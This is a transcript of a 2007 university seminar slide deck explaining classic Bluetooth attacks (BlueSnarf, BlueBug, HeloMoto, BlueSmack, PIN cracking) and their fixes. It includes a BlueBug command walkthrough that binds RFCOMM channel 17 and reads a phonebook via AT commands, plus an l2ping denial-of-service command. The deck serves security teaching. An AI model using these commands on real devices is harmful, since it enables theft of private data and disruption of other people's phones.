bluetooth security & hacks - emsec.ruhr-uni-bochum.de · 24.07.2007 folie 1/19 seminar its - ss...
TRANSCRIPT
24.07.2007 Folie 1/19Seminar ITS - SS 2007
Bluetooth Security & HacksBluetooth Security & Hacks
Andreas Becker
Seminar ITSRuhr-Universität Bochum
SS 2007
24.07.2007 Folie 2/19Seminar ITS - SS 2007
StructureStructure
1.1. IntroductionIntroduction1.1 Bluetooth Basics1.1 Bluetooth Basics
2.2. Bluetooth Security Bluetooth Security2.1 Attacks via Bluetooth - Introduction2.1 Attacks via Bluetooth - Introduction2.2 BlueSnarf2.2 BlueSnarf2.3 BlueSnarf++2.3 BlueSnarf++2.4 BlueBug2.4 BlueBug2.5 BlueJacking2.5 BlueJacking2.6 HeloMoto2.6 HeloMoto2.7 BlueSmack2.7 BlueSmack2.8 Cracking the Bluetooth PIN2.8 Cracking the Bluetooth PIN
3.3. Conclusion Conclusion
24.07.2007 Folie 3/19Seminar ITS - SS 2007
Bluetooth BasicsBluetooth Basics
Originally invented 1994 by EricssonOriginally invented 1994 by Ericsson Technology for connections of short range devices Technology for connections of short range devices Bluetooth operates within license-free ISM band (2.4 – 2.48 GHz)Bluetooth operates within license-free ISM band (2.4 – 2.48 GHz) To prevent interferences: frequency hoppingTo prevent interferences: frequency hopping
base band frequency switched 1600 times / sbase band frequency switched 1600 times / s ISM band devided into 79 freq. levels, 1 MHz distanceISM band devided into 79 freq. levels, 1 MHz distance
Connect two devices: pairingConnect two devices: pairing
Piconet (a, b) – aggregation of several piconets to scatternet (c)Piconet (a, b) – aggregation of several piconets to scatternet (c)
24.07.2007 Folie 4/19Seminar ITS - SS 2007
Bluetooth BasicsBluetooth Basics
Maximum data rate: 700 kBit/s in Version 1.2, up to 2.1 mBit/s in Maximum data rate: 700 kBit/s in Version 1.2, up to 2.1 mBit/s in Version 2.0 + EDR (Version 2.0 + EDR (enhanced data rateenhanced data rate))Generally low power consumptionGenerally low power consumptionThree different device classes:Three different device classes:
~ 20 m2,5 mW (4 dBm)2
~ 10 m1 mW (0 dBm)3
~ 100 m100 mW (20 dBm)1
Max. Operating RangeMax. output PowerPower Class
Bluetooth protocol stack:
24.07.2007 Folie 5/19Seminar ITS - SS 2007
StructureStructure
1.1. Introduction Introduction1.1 Bluetooth Basics1.1 Bluetooth Basics
2.2. Bluetooth SecurityBluetooth Security2.1 Attacks via Bluetooth - Introduction2.1 Attacks via Bluetooth - Introduction2.2 BlueSnarf2.2 BlueSnarf2.3 BlueSnarf++2.3 BlueSnarf++2.4 BlueBug2.4 BlueBug2.5 BlueJacking2.5 BlueJacking2.6 HeloMoto2.6 HeloMoto2.7 BlueSmack2.7 BlueSmack2.8 Cracking the Bluetooth PIN2.8 Cracking the Bluetooth PIN
3.3. Conclusion Conclusion
24.07.2007 Folie 6/19Seminar ITS - SS 2007
Attacks via Bluetooth - IntroductionAttacks via Bluetooth - Introduction
Rising popularity of wireless technology Rising popularity of wireless technology rising interest in abusing rising interest in abusing devices and communication channelsdevices and communication channels
Interesting facts about „victim“:Interesting facts about „victim“:Is it a mobile phone / pda / computer ?Is it a mobile phone / pda / computer ?Vulnerable to a known software leakage ?Vulnerable to a known software leakage ?Which ports are open on the target device ?Which ports are open on the target device ?
Social engineering, Social engineering, software toolssoftware tools
Blooover by trifinite group Java application for
mobile phones Allows security audits and
proof-of-concept attacks
Slax-based linux distribution Large series of audit tools Automated attacks
24.07.2007 Folie 7/19Seminar ITS - SS 2007
BlueSnarf, BlueSnarf++BlueSnarf, BlueSnarf++
BlueSnarf exploits weak OBEX implementation on mobile phonesBlueSnarf exploits weak OBEX implementation on mobile phonesOPP: Object push profile, unauthorised access, for vCardsOPP: Object push profile, unauthorised access, for vCardsSYNCH: Profile for exchange of private dataSYNCH: Profile for exchange of private data
Calendar, contacts, pictures, …Calendar, contacts, pictures, …Authorised access!Authorised access!
Adv connects to OBEX push profileNo authentication, no pairing needed invisible connection
In vulnerable implementations: SYNCH profile exists parallel to OPP Adv: retrieve files via filenames
Unauthorised, via OPP profile !!! e.g. GET telecom/pb.vcf (contacts)
Bluetooth being short range technology: NO security feature! Long Distance Snarf by trifinite.orgBlueSnarf++: Adv instead connects to OBEX FTP serverSolution: firmware update by manufactorer
24.07.2007 Folie 8/19Seminar ITS - SS 2007
BlueBugBlueBug
RFCOMMRFCOMMProtocol within Bluetooth stackProtocol within Bluetooth stackUses physical connections via L2CAP + base bandUses physical connections via L2CAP + base bandEmulates serial RS-232 connectionsEmulates serial RS-232 connectionsUp to 60 simultaneous connections (ports, RFCOMM-channels)Up to 60 simultaneous connections (ports, RFCOMM-channels)
Adv needs to know target‘s Bluetooth device address, BD_ADDR
Connects to RFCOMM-channel 17Vulnerable devices: AT-parser is listening (backdoor)Again, no authentication required
Adv is now able to execute AT commandsInitiate phone callsReading / writing SMS…Adversary stays invisible (no pairing process)!
24.07.2007 Folie 9/19Seminar ITS - SS 2007
BlueBug exampleBlueBug example
#scan for bluetooth devices:#scan for bluetooth devices:
oscar@darkside $ hcitool scanoscar@darkside $ hcitool scanScanning...Scanning...
00:0E:6D:10:1D:B600:0E:6D:10:1D:B6 Nokia 6310iNokia 6310i00:05:7A:01:A3:8000:05:7A:01:A3:80 Airbus A380Airbus A38000:06:6E:21:69:C200:06:6E:21:69:C2 Bluespoon AXBluespoon AX00:0F:DE:6C:61:0400:0F:DE:6C:61:04 T610T610
#bind channel 17 of target device to /dev/rfcomm42:
oscar@darkside $ rfcomm bind 42 00:0E:6D:10:1D:B6 17
#connect to AT terminal via, for example, cu:
oscar@darkside $ cu -l /dev/rfcomm42Connected.
AT+CPBS="ME"OKAT+CPBR=1+CPBR:1,"",,"ParisHilton"OK~.Disconnected.
24.07.2007 Folie 10/19Seminar ITS - SS 2007
BlueBug - conclusionBlueBug - conclusion
Rather simple set of commands Rather simple set of commands effective attack effective attackLimited by:Limited by:
Set of available AT commands on target deviceSet of available AT commands on target deviceAttacker‘s creativityAttacker‘s creativity
Solution: firmware updateSolution: firmware update
24.07.2007 Folie 11/19Seminar ITS - SS 2007
BlueJackingBlueJacking
No attack in terms of breaking security targetsNo attack in terms of breaking security targetsvCards: electronic business cardsvCards: electronic business cards
May get transferred via BluetoothMay get transferred via BluetoothBlueJacking: send – free of charge – messages via vCardsBlueJacking: send – free of charge – messages via vCards
„„You were BlueJacked!“You were BlueJacked!“
Has come into fashion among teenagersUsers, who are not familiar with BlueJacking might think of virus, stalker, etc. …Solution: switch Bluetooth / visibility off!
24.07.2007 Folie 12/19Seminar ITS - SS 2007
HeloMotoHeloMoto
Combination of BlueSnarf and BlueBugCombination of BlueSnarf and BlueBugExploits vulnerable implementation of „trusted devices“Exploits vulnerable implementation of „trusted devices“
Detected on some Motorola mobile phonesDetected on some Motorola mobile phones
Adv connects to OBEX push profile ( BlueSnarf ) Attempts to send a vCard … and immediately cancels the process
Vulnerability: attacker‘s device remains in „trusted devices“ history Adv uses his device status for executing AT commands ( BlueBug )
Solution: firmware update by Motorola
24.07.2007 Folie 13/19Seminar ITS - SS 2007
BlueSmackBlueSmack
Denial of Service attackDenial of Service attackHence, directed at mobile phone‘s availabilityHence, directed at mobile phone‘s availability
Similar to „Ping of Death“ against IP – based devicesSimilar to „Ping of Death“ against IP – based devicesMakes use of L2CAP echo request (ping)Makes use of L2CAP echo request (ping)
Vulnerable devices reserve input buffer of fixed length ( ~ 600 Bytes )Known for this behaviour: iPaq
Adv sends an L2CAP ping of length ≥ 600 bytesLinux: l2ping -s <num> <bd_addr>
Buffer Overflow Segmentation faultMight get exploited to execute arbitrary code
Solution: firmware update
24.07.2007 Folie 14/19Seminar ITS - SS 2007
Cracking the Bluetooth PINCracking the Bluetooth PIN
Previous attacks were aiming at insecure implementationPrevious attacks were aiming at insecure implementationThis attack exploits Bluetooth security architecture itselfThis attack exploits Bluetooth security architecture itselfPresented by Yaniv Shaked and Avishai WoolPresented by Yaniv Shaked and Avishai Wool
Objective: eavesdropping messages during pairing process, in order to brute force the used Bluetooth PIN
Security targets of Bluetooth:Confidentiality(Device) AuthenticationIntegrity
Three possible security modes:No security effortsApplication layer securityLMP ( Link Manager Protocol ) – based security
24.07.2007 Folie 15/19Seminar ITS - SS 2007
Pairing ProcessPairing Process
Two Bluetooth devices detect each other via Link Manager UnitsTwo Bluetooth devices detect each other via Link Manager UnitsBluetooth Device Addresses (BD_ADDR) detected by inquiry routineBluetooth Device Addresses (BD_ADDR) detected by inquiry routineDepending on device type: the same PIN is entered in both devicesDepending on device type: the same PIN is entered in both devices
Subsequent computations based on shared PINSubsequent computations based on shared PIN
Creation of initialization key, Kinit
Confidentially exchange random values Creation of link key, Kab, discarding of Kinit
Kab = f ( inputs of both devices ) Mutual authentication, based on Kab
24.07.2007 Folie 16/19Seminar ITS - SS 2007
Attacking the Pairing ProcessAttacking the Pairing Process
Kinit Kinit
KAB KAB
PIN candidates:PIN candidates:0000, 1234, 0001, 0002, …0000, 1234, 0001, 0002, …
repeat untilrepeat until
SRES* = SRES‘SRES* = SRES‘
24.07.2007 Folie 17/19Seminar ITS - SS 2007
Cracking the PIN – efficiencyCracking the PIN – efficiency
Mostly PINs of 4 digits are usedMostly PINs of 4 digits are usedDevices with fixed PIN: generally 0000Devices with fixed PIN: generally 0000PIN of 4 digits has been cracked within ~ 63ms on Pentium IV @ 3 GHzPIN of 4 digits has been cracked within ~ 63ms on Pentium IV @ 3 GHz
Attack on pairing process is more powerful than it might appearPairing is usually performed only once for two devicesBut: devices may discard link keys due to lack of memory, … Adversary may enforce repairing of two devices
24.07.2007 Folie 18/19Seminar ITS - SS 2007
Conclusion on Bluetooth SecurityConclusion on Bluetooth Security
The most important attacks have been presentedThe most important attacks have been presentedAttacks against weak implementations Attacks against weak implementations firmware updates! firmware updates!Attack against Bluetooth architecture itselfAttack against Bluetooth architecture itself
Bluetooth specification issuesBluetooth specification issuesSecurity-by-obscuritySecurity-by-obscurity
Short operating range Short operating range ≠ security feature≠ security featureFrequency hopping ≠ cryptographic meansFrequency hopping ≠ cryptographic meansLink key of 128 bits Link key of 128 bits reduced to PIN reduced to PIN
Main problem: UserMain problem: UserChooses short PINChooses short PINIs not aware of possible attacksIs not aware of possible attacks
Tools are getting improved steadilyTools are getting improved steadilyBloooverBloooverBackTrack 2BackTrack 2BT AuditBT Audit……
Users should…Users should…
Be aware of security risksBe aware of security risks
Especially, when prompted Especially, when prompted for PINfor PIN
Turn Bluetooth off, when Turn Bluetooth off, when possiblepossible
24.07.2007 Folie 19/19Seminar ITS - SS 2007
Thank you for your attention!Thank you for your attention!
Any Questions Any Questions ??